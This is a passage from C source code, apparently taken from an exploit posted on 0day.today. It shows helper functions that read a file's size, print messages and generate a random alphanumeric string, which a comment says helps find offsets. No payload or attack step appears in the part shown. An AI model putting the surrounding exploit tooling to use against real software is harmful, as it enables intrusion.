g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;}
void print(char* msg)
{
printf("[*]%s\n",msg);
}
void gen_random(char *s, const int len)
{ int i; //helps u find the offsets
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
# 0day.today [2024-11-15] #